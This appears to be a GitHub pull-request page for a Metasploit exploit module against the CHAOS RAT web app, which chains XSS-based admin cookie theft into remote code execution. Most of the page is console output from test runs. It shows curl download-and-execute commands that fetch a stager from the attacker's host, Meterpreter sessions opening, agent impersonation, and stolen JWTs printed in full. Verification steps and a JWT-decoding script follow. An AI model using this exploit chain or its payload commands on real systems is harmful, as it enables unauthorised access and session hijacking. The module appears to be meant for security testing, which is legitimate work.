Open h00die opened 4 weeks ago
@chebuya wanted to bring this to your attention since you discovered it
Tested and seems to be working as intended 👍
Happy to land once the rest of the feedback is resolved.
msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit
[*] Command to run on remote host: curl -so ./oYcqobeBZTuJ http://<ip>:9090/Odyz7kVKF-TYi8-49qC08A; chmod +x ./oYcqobeBZTuJ; ./oYcqobeBZTuJ &
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Fetch handler listening on <ip>:9090
[*] HTTP server started
[*] Adding resource /Odyz7kVKF-TYi8-49qC08A
[*] Started reverse TCP handler on <ip>:4444
msf6 exploit(linux/http/chaos_rat_xss_to_rce) > [*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Chaos application found
[*] Attempting exploitation through direct login
[*] Attempting login
[*] Client <ip> requested /Odyz7kVKF-TYi8-49qC08A
[*] Sending payload to <ip> (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to <ip>
[*] Meterpreter session 1 opened (<ip>:4444 -> <ip>:47768) at 2024-05-08 10:23:11 +0100
msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit
[*] Command to run on remote host: curl -so ./IyktmtoLxSkl http://<ip>:9090/7PTrmgXiZtm7zaMXvFhTIQ; chmod +x ./IyktmtoLxSkl; ./IyktmtoLxSkl &
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Fetch handler listening on <ip>:9090
[*] HTTP server started
[*] Adding resource /7PTrmgXiZtm7zaMXvFhTIQ
[*] Started reverse TCP handler on <ip>:4444
msf6 exploit(linux/http/chaos_rat_xss_to_rce) > [*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Chaos application found
[*] Attempting exploitation through Agent
[*] Server address: 172.17.0.2
[*] Server port: 8080
[*] Server JWT Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3NDY2OTMwMDAsInVzZXIiOiJkZWZhdWx0In0.E_TQ2pqNzZgRw5syoX_aXFjarI3CNvgP7DcVzLYVPu4
[*] Fake MAC for agent: b5:51:a0:d9:ee:f1
[*] Listening for XSS response on: http://<ip>:8888/
[*] Performing Callback Checkin
[*] WebSocket connecting to receive commands
[*] Performing Callback Checkin
[+] Received agent command 'whoami', sending XSS in return
[*] Received GET request.
[+] Received cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTUxNjc5MzUsIm9yaWdfaWF0IjoxNzE1MTY0MzM1LCJ1c2VyIjoiYWRtaW4ifQ.de-YBhkfbxKv7l25kw_oo6AELR6_U1nf2VD6JtWzBz4
[+] Detected Agents
Live Agents
===========
IP OS Username Hostname MAC
-- -- -------- -------- ---
<ip> Windows Administrator (Administrator) DC01 b5:51:a0:d9:ee:f1
[*] Client <ip> requested /7PTrmgXiZtm7zaMXvFhTIQ
[*] Sending payload to <ip> (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to <ip>
[*] Meterpreter session 1 opened (<ip>:4444 -> <ip>:61669) at 2024-05-08 11:32:31 +0100
msf6 exploit(linux/http/chaos_rat_xss_to_rce) > [!] The service is running, but could not be validated. Chaos application found
[*] Attempting exploitation through JWT token
[*] Fake MAC for agent: fe:9a:14:40:91:66
[*] Listening for XSS response on: http://<ip>:8888/
[*] Performing Callback Checkin
[*] WebSocket connecting to receive commands
[*] Performing Callback Checkin
[+] Received agent command 'whoami', sending XSS in return
[*] Received GET request.
[+] Received cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTUxNjg1MDgsIm9yaWdfaWF0IjoxNzE1MTY0OTA4LCJ1c2VyIjoiYWRtaW4ifQ.8MjwkzGcIT0QatzRf6kMLMihBTdKyFQb1mrzGfJj9Ho
[+] Detected Agents
Live Agents
===========
IP OS Username Hostname MAC
-- -- -------- -------- ---
<ip> Windows Administrator (Administrator) DC01 a8:ae:8a:9e:e0:11
<ip> Windows Administrator (Administrator) DC01 fe:9a:14:40:91:66
[*] Client <ip> requested /Odyz7kVKF-TYi8-49qC08A
[*] Sending payload to <ip> (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to <ip>
[*] Meterpreter session 2 opened (<ip>:4444 -> <ip>:33236) at 2024-05-08 11:46:05 +0100
CHAOS v5.0.8 is a free and open-source Remote Administration Tool that allows generating binaries to control remote operating systems. The webapp contains a remote command execution vulnerability which can be triggered by an authenticated user when generating a new executable. The webapp also contains an XSS vulnerability within the view of a returned command being executed on an agent.
Execution can happen through one of three routes:
JWT token from an agent can be provided to emulate a compromised host. If a logged-in user attempts to execute a command on the host, the returned value contains an XSS payload. JWT token can be extracted.

Verified against CHAOS 7d5b20ad7e58e5b525abdcb3a12514b88e87cef2 running in a docker container.

Verification
use exploit/linux/http/chaos_rat_xss_to_rce
set rhost [ip]
set username [username], set password [password]
set jwt [jwt token]
set agent [path to agent]
run
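The two JWTs shown in the testing output above (the agent's server token and the admin cookie recovered through the XSS), decoded as an added example that is not part of the module or this PR: it inspects header and claims only, without verifying signatures, and shows that the agent token carries no issued-at claim and expires about a year out, while the admin session cookie is valid for one hour.

```python
import base64
import json
from datetime import datetime, timezone
from typing import Optional, Tuple

# Tokens copied from the testing output above. Signatures are not checked
# here; this is claim inspection for token-hygiene review only.
AGENT_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3NDY2OTMwMDAsInVzZXIiOiJkZWZhdWx0In0."
    "E_TQ2pqNzZgRw5syoX_aXFjarI3CNvgP7DcVzLYVPu4"
)
ADMIN_COOKIE = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTUxNjc5MzUsIm9yaWdfaWF0IjoxNzE1MTY0MzM1LCJ1c2VyIjoiYWRtaW4ifQ."
    "de-YBhkfbxKv7l25kw_oo6AELR6_U1nf2VD6JtWzBz4"
)


def b64url_decode(segment: str) -> bytes:
    # JWT segments drop base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt(token: str) -> Tuple[dict, dict]:
    # Split into header, payload and signature; the signature is ignored.
    header, payload, _sig = token.split(".")
    return json.loads(b64url_decode(header)), json.loads(b64url_decode(payload))


def token_lifetime(payload: dict) -> Optional[int]:
    # Validity window in seconds when the token records when it was issued
    # ("orig_iat" is what this app emits, "iat" is the standard claim).
    iat = payload.get("orig_iat", payload.get("iat"))
    return payload["exp"] - iat if iat is not None else None


def summarize(token: str) -> dict:
    header, payload = decode_jwt(token)
    return {
        "alg": header.get("alg"),
        "user": payload.get("user"),
        "authorized": payload.get("authorized"),
        "expires": datetime.fromtimestamp(payload["exp"], tz=timezone.utc).isoformat(),
        "lifetime_s": token_lifetime(payload),
    }


if __name__ == "__main__":
    for name, tok in (("agent token", AGENT_TOKEN), ("admin cookie", ADMIN_COOKIE)):
        print(name, summarize(tok))
```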